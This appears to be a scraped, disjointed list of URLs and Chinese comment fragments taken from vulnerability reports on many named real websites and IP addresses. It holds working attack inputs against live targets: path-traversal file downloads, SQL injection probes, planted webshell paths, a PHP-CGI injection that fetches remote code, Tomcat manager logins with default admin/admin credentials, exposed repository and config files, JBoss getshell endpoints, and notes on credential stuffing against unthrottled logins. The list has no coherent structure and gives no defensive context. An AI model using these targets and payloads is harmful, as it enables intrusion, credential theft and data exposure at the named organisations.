http://www.szsnews.net/date_panel.aspx?PaperType=esrb http://epaper.jnwb.net/date_panel.aspx?PaperType=esrb http://www.xingandaily.cn/date_panel.aspx?PaperType=esrb http://epaper.lbwbw.com/date_panel.aspx?PaperType=esrb http://m.yyrb.cn/date_panel.aspx?PaperType=esrb http://epaper.zhangzepower.com/date_panel.aspx?PaperType=esrb http://www.xjrb.net/date_panel.aspx?PaperType=esrb http://epaper.eccc.com.cn/date_panel.aspx?PaperType=esrb http://ypb.yuping.gov.cn:3080/date_panel.aspx?PaperType=esrb http://esrb.enshi.cn/date_panel.aspx?PaperType=esrb 
http://epaper.zhangzepower.com/date_panel.aspx?PaperType=esrb http://106.120.238.126:443/ http://i.cnblogs.com/Import.aspx?catid=1 file:///C://WINDOWS/SYSTEM32/DRIVERS/ETC/HOSTS xmlns:dc="http://purl.org/dc/elements/1.1/ xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/ xmlns:wfw="http://wellformedweb.org/CommentAPI/ xmlns:slash="http://purl.org/rss/1.0/modules/slash/ http://www.cnblogs.com/kuoaidebb/ http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html dc:creator dc:creator http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html http://poc.qingcheng.com http://station.qingcheng.com http://www.daimayi.com/index.php/Loan/loan_detail/p_id/46/i_id/6 http://3g.i.xywy.com/index/login http://passport.xywy.com/member/login.htm?ucback=http%3A%2F%2Fwww.xywy.com%2F,可以看到这个接口也是没有任何登陆限制的,以为也是要和3G的接口一样输入错误几次之后才出现验证码之类的,结果这个接口连验证码都没有 http://lomoservices.lomopai.cn:10154/EditImagev2.2.html?imageName=151c6c6c3bd94899b6d1acedbdb3021c.jpg&sid=670&uid=oFrD3jmTtvVbZHbsQh0YmGKXnKm0&coid=gh_795a11896e12&m=0 www.lomopai.cn,决定直接从数据入手。 http://weixin.lomopai.cn/,通过注入点跑出了所有用户的账号密码。 http://www.8dol.com/ http://wooyun.org/bugs/wooyun-2010-0108762 http://dsp.cig.com.cn http://dsp.cig.com.cn/autodsp/upload/5531b63e583e2.php http://59.151.102.45/comment/All/Default.aspx http://59.151.102.45/ems/ https://121.28.6.30/por/login_psw.csp http://218.15.221.42:8180/ZhaoQingSys/ http://218.15.221.42:8180/ZhaoQingSys/addJgxx.action http://218.15.221.42:8180/ZhaoQingSys/addJgxx.action http://218.15.221.42:8180/ZhaoQingSys/addJgxx.action https://183.62.57.37/por/login_psw.csp https://vpn.zcmu.edu.cn/por/login_psw.csp https://vpn.hutc.zj.cn/por/login_psw.csp https://vpn.zknu.edu.cn/por/login_psw.csp http://tieba.baidu.com/f/bawu/commit/update_member_alias这个链接提交kw和mbr_alias参数,kw是贴吧名称,mbr_alias是要修改的会员名称 http://tieba.baidu.com/f/bawu/commit/update_member_alias http://cms.jiangnan.edu.cn/cms就可以看到后台登陆地址,是一个古老的系统,测试下之前爆出来的漏洞,果然是没有修补上,呵呵呵呵呵。。。 
cms.jiangnan.edu.cn/cms/web/downloadFiles.jsp?file=../../../../../../home/cms61.sql http://cms.jiangnan.edu.cn/cms/editor/filemanager/browser/default/browser.html?Type=../../../../../home/cms61/webapps/cms/&Connector=connectors/jsp/connector http://career.fengyunzhibo.com/ http://service.caijing.com.cn/usermanage/login/ http://m.secoo.com/ http://iphone.secoo.com/ http://app.xiaopi.com//.svn/entries https://github.com/feiniu7903/feiniu_pet/blob/41675b17bb90cea95a9112bda0138c694ffd8f8a/Super_operate/src/config/edm_config.properties http://mailer.lvmama.com:8081/smartedm/services/EDMService http://xjt.medlive.cn/login.do http://www.happigo.com/score/?category=1 http://bbs.51credit.com//config/config_global.php.bak http://www.dswjcms.com/ index.php/Site/article/id/1* http://www.xiaobeidai.com/index.php/Site/article/id/18 http://manage.hxbank.biz/index.php/Site/article/id/28 http://www.u1touzi.com/index.php/Site/article/id/24 http://www.fylc888.com/index.php/Site/article/id/112 http://www.yichengjr.com/index.php/Site/article/id/4 http://www.zlinfo.com.cn/fckeditor//editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.zlinfo.com.cn/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F http://pu.yonyouup.cn/login!loginIndexPage.action http://tool.110.com/fy.php?q=123 http://gh.bjpost.com.cn/homepage.action http://www.bangcle.com/account/base_edit/ http://www.bangcle.com/static/license/10987.html http://www.dswjcms.com/ index.php/Site/listTpl/id/1* http://manage.hxbank.biz/index.php/Site/listTpl/id/16 http://www.u1touzi.com/index.php/Site/listTpl/id/21 http://www.xiaomenkou.cn/index.php/Site/listTpl/id/21 http://www.luoshangdai.com/index.php/Site/listTpl/id/16 http://www.abroadcash.com/index.php/Site/listTpl/id/28 http://oa.hrsec.com.cn/login/Login.jsp?logintype=1 http://www.myuios.com/.git/config http://219.135.157.142:9000/irpt/i/oem/grpslogin.jsp 
http://xt.shkdoa.cn:9001/TuoMing/console/tuoming/productJsonAction@input@tuomingInfo.action http://110.249.216.82/Qt_load.do encap:Ethernet D1:C2:96 addr:10.1.1.56 Bcast:10.1.1.255 Mask:255.255.255.0 MTU:1500 packets:637803953 packets:627068681 https://**.**.**/por/login_psw.csp http://www.xike123.cn/ http://wx.sz96296.com/.svn/entries http://119.57.253.101:8010/phpmyadmin/ http://house.dzwww.com/login.php?forward=/ask/这个接口,没有任何登陆保护限制 http://k.yiban.cn/index.php?a=teacherDetail&c=teacherlist&teacherid= http://60.28.168.135/ http://60.28.168.136 http://60.28.168.186/ https://w-tempt1.out.bjcc.qihoo.net/ url:http://www.hnacargo.com/ http://e.kesion.com/ask/ http://e.kesion.com/ask/q-342.html http://www.zjs.com.cn/ws_hr/ws_recruitment_index.aspx http://www.zjs.com.cn/ws_news/ws_news_newssearch.aspx www.zjs.com.cn http://www.hcjdc.com/.svn/entries http://www.hcjdc.com/phpinfo.php http://www.weiping.com/ http://www.weiping.com/用户名 http://www.weiping.com/zhengxq111 http://www.weiping.com/zhengxq111 http://www.weiping.com/zhengxq111 http://www.weiping.com/zhengxq111 http://www.androidesk.com/.git/config http://s.androidesk.com/.git/config http://jira.adesk.com/secure/Dashboard.jspa http://210.14.154.139:8649/ shell:http://www.foscam.com.cn/upimg/1.asp;.pdf http://www.foscam.com.cn/foscam.com.cn.rar http://www.foscam.com.cn/admin/ http://www.foscam.com.cn/admin/ad_html/editor/filemanager/browser/default/browser.html?Type=File&Connector=http%3A%2F%2Fwww.foscam.com.cn%2Fadmin%2Fad_html%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://buy.ems.com.cn/),后台的收货地址管理中,对查询收货地址详情的请求没有判断权限,导致可以根据任意数字ID查询其他用户的收货地址、身份证扫描件等资料。 http://159.226.40.241/ http://file.myfund.com/login.html http://aboutus.cits.cn/ http://222.222.32.19:18080/suite/portal/portalView.do?siteKey=0 http://aa.asus.com.cn/Account/Login.aspx http://**.**.**/general/vmeet/wbUpload/test.php http://**.**.**/sql.php 
http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=560236&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=15431BCC4B0F7C31E0742FC72DE46F3928D20A07DE91CC3767049198F0818D3FF877D2D39083FA845D40908365E76E88 http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=111111&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=74D3E2DA8132404D5485B918CABAA10851B1F2B79E0E14F5D70CE4B363ED710BD17AAFED3DB5B39F6D1C21FB547F93599F0BC118A451F187C1C029B2C3978A3F http://paipaiwebservice.jstv.com/api/awards?jsoncallback= https://hbp1.happigo.com/csm/index.php?s=/Public/complain http://dx.ctans.com/online/admin/ http://brandbase.mama.cn/friso.php?forumid=122&mod=thread http://sqlmap.org http://value.17wo.cn/resource/value17wo/LoginForm.action http://www.hunliji.com/merchant/account_manages/fill_info?merchant_id={11481 https://github.com/zhaoming200808/go/blob/b6360310e539c8445593c61005880b2ac677c7d1/tool/gomail.go http://**.**.**/ http://www.hunliji.com/exhibit/community_threads/33510 http://www.hunliji.com/exhibit/community_threads/33507 http://www.goldlib.com.cn/ http://210.26.83.207:8001/opac/getCollection?libId= http://114.242.187.29:8080/opac/getCollection?libId= http://211.84.163.240:8080/opac/getCollection?libId= http://113.247.235.133:8081/opac/getCollection?libId= http://library.cnuschool.org.cn:8080/opac/getCollection?libId= http://mcloud.kingdee.com/mcloud/pages/ http://mcloud.kingdee.com http://mcloud.kingdee.com/mcloud/pages/ string:340727 string:340727 user:reference:c0-e1 pwd:reference:c0-e2 https://github.com/digpads/Web/blob/bb74cd1950379cc431082e0811bafb2cffd6a98d/demo/zhanghao.txt https://github.com/huoshaoyun/wedding_web(文件放到web目录下) http://112.124.46.39:8081/web/wap/appdown.html https://github.com/huoshaoyun/hunliji_spring hammerhead:/system http://oa.ayinfo.cn http://car.weimaiche.cn/xiamen/neiye.php?id=4 http://www.goldlib.com.cn/ http://211.84.163.240:8080/opac/getClassNumberTree?id=1 
http://210.26.83.207:8001/opac/getClassNumberTree?id=1 http://210.27.181.211/opac/getClassNumberTree?id=1 http://114.242.187.29:8080//opac/getClassNumberTree?id=1 http://113.247.235.133:8081//opac/getClassNumberTree?id=1 http://www.hunliji.com/exhibit?search= http://www.mfff.org.cn/view_zs.jsp?id=182 http://www.cxtuku.com/.svn/entries http://60.28.205.41:8280/shouji/admin.htm http://bk.hunliji.com http://bk.hunliji.com http://tool.w3cschool.cc/languages/online.php?language=python ps:shell已经删除,未深入 http://agent.189-3g.com:80/ http://bbs.uc.cn http://www.163.com http://m.qfpay.com/wp-login.php http://m.qfpay.com/wp-content/plugins/hello.php http://www.itophome.com http://www.itophome.com:80/ http://www.itophome.com/usermanage.aspx?flag=7&uid=11 www.itophome.com http://220.181.79.17/webmail/ http://220.181.79.17/webmail/.svn/entries http://www.jenomc.com/search.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.123.cc/123.txt http://bbs.lznews.cn//config/config_global.php.bak http://121.40.89.44/ http://www.infojiading.cn/ http://jy.esu.edu.cn/ActivityList.asp?TactiID=5 http://job.sicfl.edu.cn/ActivityList.asp?TactiID=29 http://job.shmtu.edu.cn/ActivityList.asp?TactiID=124 http://jiuye.sbs.edu.cn/ActivityList.asp?TactiID=13 http://jy.shutcm.edu.cn/ActivityList.asp?TactiID=37 http://job.sicfl.edu.cn/zyjs.asp?Txy=18&tzy=10 http://job.xq.sh.cn/zyjs.asp?Txy=12&tzy=15 http://job.shmtu.edu.cn/zyjs.asp?Txy=8&tzy=14 http://career.sdju.edu.cn/zyjs.asp?Txy=11&tzy=12 http://jy.esu.edu.cn/zyjs.asp?Txy=18&tzy=10 http://**.**.** gms.zufangzi.com/gms/getfile/pdf/contract/20150304/PEK10001523.pdf?orderItemId=1534&contractId=202&agentId=1679 http://58.56.128.81:8080/ https://passport.alipay.com/mini_login_check.js?callback=jQuery17205112576861865819_1430734520188&site=1&_input_charset=utf-8&ctoken=dzUY3ljC9CvBo4wGz1jzaemAHxS7PR&_=1430734529099 https://passport.alipay.com/mini_login_check.js?callback=xxxxxx&site=1 http://doc.vlinkage.com/phpinfo.php 
http://base.vlinkage.com/phpinfo.php http://lyzbj.com/plus/hongfeng.php http://service.shopex.cn/.svn/entries http://my.shopex.cn/.svn/entries http://service.shopex.cn/.svn/entries http://www.shfato.com/english/cer1.asp?id=22 http://113.106.236.12:8000/portal/login_init.action http://221.206.40.103/portal/login_init.action http://www.yodo1.com.cn/.git/config https://github.com/SiQLuxe/Snapshot/blob/c6a532699920ca4de6f8342cc25aa881dde64dd0/mytrash/hdp/runJob.sh http://cnsz131084.app.paic.com.cn:8080/oozie http://CNSH041567.app.paic.com.cn:8080/oozie http://hdp-oozieserver-prd.app.paic.com.cn:8080/oozie Dheader:j_username=V_PA011_HADOOP_CORE Dheader:j_password=${j_password https://github.com/SiQLuxe/Snapshot/blob/c6a532699920ca4de6f8342cc25aa881dde64dd0/network/proxy/PAC/proxyforwebx.pac http://passport.aplusapi.pptv.com/regandlogin_pay_vip/registerandlogin.html?error=%E7%94%A8%E6%88%B7%E5%90%8D%E4%B8%BA%E7%A9%BA%E6%88%96%E8%80%85%E7%94%A8%E6%88%B7%E4%B8%8D%E5%AD%98%E5%9C%A8&username=bklm1&action=login&jscall=redirect http://wms.fday.co/未授权访问 site:fday.co http://wms.fday.co/checkin/stat/by_item http://wms.fday.co/checkin/stat/by_item/export http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=9 http://co-diovan.medlive.cn/?m=academic&c=video&id=30 http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=9 http://co-diovan.medlive.cn/?m=case&c=option&action=detail&id=9 http://www.canzhuowang.cn/member/order?id=1 http://admin.canzhuowang.cn/admin.php后台存在SQL注入,路径暴露 http://klmywxzj.klmy.gov.cn/logInit.action http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org https://wsc.sptcc.com/sptcc/index/tologin!init http://qdslyy.qdslyy.cn/Admin/login.aspx?ReturnUrl=%2fadmin%2findex.aspx http://web.7k7k.com/codes/get.php?pid=1 http://www.piaoyou.org/ http://demo.piaoyou.org/ http://demo.piaoyou.org http://222.222.120.20:81/geosite/ www.to-dream.com拓之林网络营销顾问,该公司的cms存在后台权限绕过漏洞,使用万能密码admin http://www.to-dream.com/manage/index.aspx 
http://bj.crland.com.cn/manage http://www.guofengmeitang.com/manage http://www.bcegre.com.cn/manage/login.aspx http://www.sycrland.com/manage/login.aspx http://www.dongrun.com.cn/manage/login.aspx http://cnb.nlc.gov.cn http://www.1337day.com/exploit/23480 url:http://agentclub.hnair.com/ http://a.fangdamai.com http://189.etao189.com/main.jhtml http://soft-sk.yonyou.com/news/more.jsp?boardbh=implementthink http://bj.crland.com.cn/ http://bj.crland.com.cn/manage/后台登陆框post注入,抓包sqlmap跑 http://sqlmap.org http://news.appapi.zjol.com.cn/ZJonline/admin/ http://i.kesion.com/ http://i.kesion.com/ http://i.kesion.com/user/index.aspx http://www.maiguo01.com/team.php http://www.maiguo01.com//admin/kindeditor/attached/flash/20150504/20150504234645_33420.swf/1.php http://220.161.90.230:2011/ http://61.156.217.133:2011 http://szkin.8866.org:2011/ http://58.47.159.72:2011 http://mtc.f3322.net:2012 http://mtyd.f3322.net:2012 http://120.26.43.95:4000 http://www.googosoft.com/ http://211.67.63.14/dxyq/zfcgFrame/xx_look.aspx?ID=1 http://211.69.16.30/dxyq//zfcgFrame/xx_look.aspx?ID=1 http://210.31.141.73/dxyq/zfcgFrame/xx_look.aspx?ID=1 http://211.64.120.53/dxyq/zfcgFrame/xx_look.aspx?ID=1 http://211.67.112.115/dxyq//zfcgFrame/xx_look.aspx?ID=1 http://www.goldlib.com.cn/ http://210.26.83.207:8001/opac/journal_guide?inital=N&marc_type=1&tag=journal_guide&subtag=subletter http://113.247.235.133:8081/opac/journal_guide?inital=P&marc_type=1&tag=journal_guide&subtag=subletter http://114.242.187.29:8080/opac/journal_guide?inital=Q&marc_type=1&tag=journal_guide&subtag=subletter http://211.84.163.240:8080/opac/journal_guide?inital=N&marc_type=0&tag=journal_guide&subtag=subletter http://library.cnuschool.org.cn:8080/opac/journal_guide?inital=C&marc_type=1&tag=journal_guide&subtag=subletter http://mygoodbaby.gb246.com/robots.txt一瞅。dedecms http://web.7k7k.com/phone/h.php?id= http://www.gddygs.com/invoker/JMXInvokerServlet http://www.younglight.com.cn/invoker/JMXInvokerServlet 
http://www.gdnxfd.com/invoker/JMXInvokerServlet http://www.ticket-easy.cn/invoker/JMXInvokerServlet http://demo.yxcms.net/ http://www.lesuzhou.com/index.php http://www.k3led.cn/led/index.php http://qy002.demo.jz004.com/index.php http://www.sscproxy.com/index.php http://www.cctv1949.com/index.php http://jkpt.jlsafety.gov.cn http://bec.pigai.org/ http://bec.pigai.org/index.php?bmsg=Z4lx http://www.tuyou.com/ http://oa.cupl.edu.cn/logs/login.log http://www.mama.cn/ask/q5784057-p1.html http://apcc2.com/qualifications.aspx?oid=000e7f69-0000-0002-0000-00002a638e70 http://apcc2.com/list.aspx?oid=000e7f69-0000-000d-0000-00002a6b5a7d http://apcc2.com/PartNodeDetail.aspx?oid=0008f2a5-0000-0000-0000-0000015ac6d3 http://apcc2.com/news_show.aspx?oid=00037db4-0000-0000-0000-00001cd4cf6a http://apcc2.com/newslist.aspx?oid=000f7374-0000-0000-0000-000001535e35 http://apcc2.com/speciallistall.aspx?oid=00131d97-0000-0000-0000-00009bb37c07 http://apcc2.com/project.aspx?oid=000fcad5-0000-0000-0000-00009fc017ce http://apcc2.com/Speciallist.aspx?oid=00131d97-0000-0005-0000-00009bb611d4 http://apcc2.com/qualifications_show.aspx?oid=0 http://apcc2.com/business.aspx?oid=00098196-0000-0009-0000-000001bfa613 http://apcc2.com/honours.aspx?type=%E5%9B%BD%E5%AE%B6%E7%BA%A7 http://lld.caca118114.com/Default.aspx inurl:topiccode= http://www.loca.hk/news.php?id=17 http://www.loca.hk/admin/adminindex.php https://218.29.130.242/ http://121.8.226.124:8080 http://ichuguo.chinadaily.com.cn/gallery/index/gid/10 http://www.zhixingche.me/user/login http://topic.chinadaily.com.cn/index/special/sid/698 http://222.247.54.157/ http://yn.bnet.cn/ http://42.96.201.175/jianwei_new/,发现有目录列表 http://42.96.201.175/jianwei_new/index.php/Public/login http://42.96.201.175/jianwei_new/upload/,我随便查看下2014年6月份的信息 http://oa.tcl.com/nulljsp.jsp http://www.xilaikd.com/xilaikd/login.jsp shell:http://www.xilaikd.com/xilaikd/upload/bak.jsp http://ioa.hisense-plaza.com/nulljsp.jsp 
http://ichuguoimage.chinadaily.com.cn/video/detail/vid/8284724 http://www.bjppb.gov.cn/ http://123.127.133.25/enterpriseInfowaiwang_findAllEnterpriseInfowaiwang.action http://tv.credithc.com/index.php?m=bosstv&c=LoginBoss&a=dologin http://z.yirendai.com/.svn/entries http://www.dtnews.cn/ http://www.dtnews.cn/gallery/gallery.aspx?cid=394166 http://www.dtnews.cn/c/shownews/one.asp http://www.yfxd.com.cn/ http://www.yfxd.com.cn:81 http://www.dswjcms.com/ index.php/Site/page/id/1.html http://manage.hxbank.biz/index.php/Site/page/id/21 http://www.jucash.cn/index.php/Site/page/id/13 http://www.u1touzi.com/index.php/Site/page/id/34.html http://www.yichengjr.com/index.php/Site/page/id/1.html http://www.ynhdd.com/index.php/Site/page/id/35.html http://erm-kbs.ruc.edu.cn/Ext/GetImage.ashx?t=thumb&id=69bdffc7-3eff-487e-81a4-f120980bd97b http://youhui.51credit.com/.svn/entries http://banks.51credit.com/.svn/entries http://m.feiniu.com http://m.hongkongairlines.com/ci/index.php/annual/annual_detail?annual_contact_id=&bi.mi=null&bimi=null&memberId=null&uuidctoke=88e50c89c00e0550833fa6e03e81956d_EN&yearTicketCode=1 http://tg2.883wan.com/.svn/entries http://www.gzs.com.cn官网里面有个网上营业厅, https://wt.gzs.com.cn/servlet/user/LoginAction https://wt.gzs.com.cn/servlet/user/LoginAction https://pm.jx.chinaccs.cn:20808/jmx-console/ https://pm.sn.chinaccs.cn:20806/jmx-console/ http://42.123.72.166:8080/mx-console/ http://42.123.72.171:8080/mx-console/ http://42.123.72.148:8080/mx-console/ http://42.123.72.178:8080/mx-console/ https://pm.jx.chinaccs.cn:20808/jmx-console/为例 http://jifenshangcheng.m.xunlei.com/cgi-bin/integra_info?userId=219509333&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1 http://bbs.zgzcw.com//config/config_global.php.bak https://www.yonyoufinancial.com http://www.waitalone.cn/phpcmsv9-poster_click-injection-exp.html http://m.feiniu.com http://web.mail.tom.com/webmail/login/index.action?from_domain=web.mail.tom.com www.991168.com www.991168.com 
http://tangyuan.tom.com/login.php可以看到没有任何登陆限制 http://site.jxt189.com/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content http://www.sbk2000.com/Client_list.aspx http://218.199.208.30/sbk8/Platform_content.aspx?id=4&Action=RulesMessage http://lab.scuec.edu.cn/ServerManager/Platform_content.aspx?id=10&Action=OAMessage http://210.42.171.27/sbk8/Platform_content.aspx?id=4&Action=RulesMessage http://sbgl.htu.cn/sbk8/Platform_content.aspx?id=3&Action=OAMessage http://119.97.240.106:9999/Platform_content.aspx?id=3&Action=RulesMessage http://zichan.xnec.cn:10002/sbk8/Platform_content.aspx?id=4&Action=RulesMessage http://210.42.255.109/sbk8/Platform_content.aspx?id=10&Action=OAMessage http://game.chinaiiss.com/.svn/entries http://www.daimayi.com/index.php/Apply/get_census?code= http://think.lenovo.com.cn:80/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:81/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:82/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:88/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:88/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:90/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8001/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8080/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8081/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8082/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 
http://think.lenovo.com.cn:8088/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8090/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:8888/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:9000/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://think.lenovo.com.cn:9090/support/minisite/thinkpad/htmls/advancedsearch.aspx?doccatid=1250747291546&page=1 http://api.kd.yintai.com/api.kd.yintai.com.rar sim.yintai.com/web.rar news.yintai.com/web.zip about.yintai.com/about.rar https://60.190.224.20:8443/tellin/opr/baseline/login.do?CLS=OPR&UITRANSFER=servicekey:0 https://60.190.224.20:8443/tellin/usr/uap/uaplogin.do?CLS=USR&UITRANSFER=servicekey:296 https://60.190.224.20:8443/jmx-console/ http://www.kssl.gov.cn/sitecilent/imglist.aspx?infotype=slfjq url:http://202.96.124.89:8080/webclient/ http://202.96.124.89:8080/webclient/user/login.action jboss-4.2.3.GA/server/default/./tmp/deploy/tmp5396928387299354540webclient-exp.war/ https://github.com/cloudbian/MSG_CENTER/blob/12191d0faf63c563751f442e827dfe5d7a54fc69/MsgCenter/src/com/bjj/resources/props/application.properties http://58.246.134.82:1550/PayProxy/alipayforwebCallBack http://58.246.134.82:1550/PayProxy/alipayForWapCallBack https://www.yeepay.com/app-merchant-proxy/command.action http://58.246.134.82:1550/PayProxy/yeePayforonlineCallback https://www.yeepay.com/app-merchant-proxy/node http://58.246.134.82:1550/PayProxy/kqbillCallback http://203.110.164.10:8888/sms.aspx http://qym.bingdian.com/ www.ipeen.com.tw http://218.242.168.130:8080/sfgc/ http://218.242.168.130:8080/zmeu/zmeu.jsp http://aboutus.cits.cn/travel/login.jsp www.jiayuan.com&new_header=1&channel=index http://www.jiayuan.com http://cget.zjwq.net/ url:http://121.42.44.246:8888/manager/html user:admin pass:admin http://www.tjpme.com:80/ 
www.tjpme.com url:http://221.207.32.166:8888/manager/html user:admin pass:admin http://221.207.32.166:8888/qhgjjSystem/login.action http://221.207.32.166:8888/systemManager/doLogin.action http://223.202.59.132/,可查看该公司天津机房监控的总流量信息; url:http://210.83.225.142:8888/manager/html user:admin http://210.83.225.142:8888/ http://210.83.225.142:8888/qdjm/menu/SelectMain.action# http://210.83.225.142:8888/qdjm/menu/SelectMain.action http://218.80.228.12:8080/irp/login.seam;jsessionid=31518AE572429350488F92441BF9E313?cid=2733 http://m.110.com/login/ url:http://125.71.28.78:8888/manager/html user:admin pass:admin http://baiyehao.yiji.com/product/productSearch.do http://baiyehao.yiji.com/product/productSearch.do url:http://220.248.226.85:8888/manager/html user:tomcat pass:tomcat http://sso.cqpost.com/normal/main.jsp url:http://121.28.83.210:8888/manager/html user:admin http://121.28.83.210:8888/mvnforum/mvnforum/logout meeting.cthy.com/booking/?rid=81 url:http://125.64.91.74:8888/manager/html user:admin pass:admin http://202.109.145.148:8888/wooyun/ http://101.227.68.206/home/login http://180.168.201.42:8080/c3tidms/dms/login.action http://180.168.201.42:8080/invoker/JMXInvokerServlet拿到getshell http://www.kugou.com/openplat/kugou/index.php?r=oauth/login&client_id=201404018624&redirect_uri=http%3A%2F%2Fgdhg.kugou.com%2FloginCallback.php&code=3da4e18ab25146fa9e09b7397277c52d&time=1397012685&wap=0这个接口,可以看到没有任何登陆限制,一开始找了一个接口,也是没有任何登陆限制,然后撞库好久才发现跳出来了限制坑大了。。这个接口测试之后是没有任何限制的 http://www.diandian.com/login这个接口,也就是点点博客的主站登陆接口,可以看到这个登陆接口是没有任何限制的 http://emp.cnpc.com.cn/ http://emp.cnpc.com.cn/ http://iptv.cnpc.com.cn/ http://iptv.cnpc.com.cn/phpinfo.php http://iptv.cnpc.com.cn/administrator/index.php http://mms.cnpc.com.cn:8080/mms4.3.3/login.jsp http://fex.baidu.com/ueditor/#server-django http://218.57.131.146/caigou/NoticeList.aspx?Type=1%27 http://webop.gfan.com https://member.niwodai.com btg.com.cn/******,huoyan@btg.com.cn/****** https://passport.mafengwo.cn 
http://user.syyx.com/login.aspx这个接口,可以看到是有验证码限制的,但是经过测试之后发现这个验证码是只要输入正确一次就可以一直正确,验证码形同虚设 http://www.jsychrss.gov.cn/msg.php?id=26674 Payload:http://www.jsychrss.gov.cn/msg.php?id=26674'%20and%20'1'='1 http://www.jsychrss.gov.cn/msg.php?id=26674'%20and%20'1'='2 http://www.jsychrss.gov.cn/list.php?zt_type=108000000000000 http://www.jsychrss.gov.cn/nm_show.php?id=18632 http://www.jsychrss.gov.cn/nm_c_show.php?id=26662 http://vb.vlinkage.com http://www.xunyee.cn http://www.xunyee.cn http://vp.vlinkage.com http://vp.vlinkage.com/app/config se-extension://ext-1977427434/popup.html http://apixy.zuiyouxi.com:8800/admincp/admin/loginUser/ http://www.changlingauto.com/Default.asp?p_code=a http://120.136.171.179:8080/cas/login http://120.136.171.179:8080/jmx-console http://www.vpclub.cn http://www.yiii.net/product/online.html,选择一个在线测试的样本,这里选择163魔板的,其他的一样。 http://old.hnkjt.gov.cn/new/allListDetail.eiip?cid=1&dataId=3595 http://101.227.253.92:8080/edu/ http://101.227.253.92:8080/edu/login!login.do http://101.231.52.2:8888/login/Login.jsp?logintype=&gopage=&languageid=7&message=18 http://101.231.52.2:8888/login/VerifyLogin.jsp http://101.231.52.2:8888/wui/theme/ecology7/page/login.jsp?templateId=21&logintype=1&gopage=&languageid=7&message=17 https://donkey.cc.ncu.edu.tw/~training/bin/class.php?id=18 http://tms.jiuxian.com/Account/Login http://www.lzjszj.com/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=3&CDID2=2&WSMID=3&WEBMID=3 http://www.gzsjsjc.com/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=52&CDID2=2&WEBMID=4 http://125.46.87.55/zz_xhtsys/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=83&CDID2=2&WSMID=162&WEBMID=162 http://www.bhjczx.cn/web/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=132&CDID1=2&WSMID=226&WEBMID=10 http://www.esceqs.com.cn/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=93&CDID2=2&WSMID=200&WEBMID=183 http://www.lygczl.cn/MainPage/DataInfomation/ListInfo.aspx?ColumnType=M1&ID=79&CDID2=2&WSMID=1&WEBMID=1 
http://222.29.253.58:8080/manager/html http://museum.ruc.edu.cn/admin/ftb.imagegallery.aspx http://io.ruc.edu.cn/modules/mod_news_show_gk3/style/style.php http://202.112.118.46/ywcdwz/zxdt2.jsp?zxdt_id=9 http://www.365pp.com/Member/Setting/UserAddress http://www.365pp.com/Member/Trade/OrderDetail?orderid=%27 https://101.231.40.234/ http://www.vpclub.cn/login/index http://user.syyx.com/login.aspx昨晚发现的这个接口有验证码但是可以绕过限制,昨天晚上太困了没撞库只爆破了一下证明就睡觉去了,这是游戏网站不撞库出来点游戏装备或者rmb账户啥的不甘心啊,早上6点多就醒了(好久没醒这么早了),起床后开电脑找了找终于又被我找到了一个接口:http://nycs.jbl.syyx.com/login.aspx?serverid=110 http://oa.yhdtv.com.cn/login.aspx?action=logout http://gl.sxxw.net/Admin/index.php/Public/login http://gl.sxxw.net/Admin/index.php/Floor/add/ http://218.22.66.214:8088/search_wh.aspx http://218.22.66.214:8088/,竟然存在目录列表漏洞 https://github.com/love-somnus/smart-batch/blob/b3a840a3df0120d533d6c150aaebcbc9d55d1a88/src/main/resources/env/batch-dev.properties http://eduapp.dahe.cn/toupiao/e/member/login/这个接口,也是大河网站旗下的一个站点,可以看到登陆接口没有任何限制 http://wooyun.org/bugs/wooyun-2010-0108219 pam8rQecwxNGIUy8vZsCUtpspLLi3L1:16506:0:99999:7 http://58.215.139.37:9200/_search?pretty 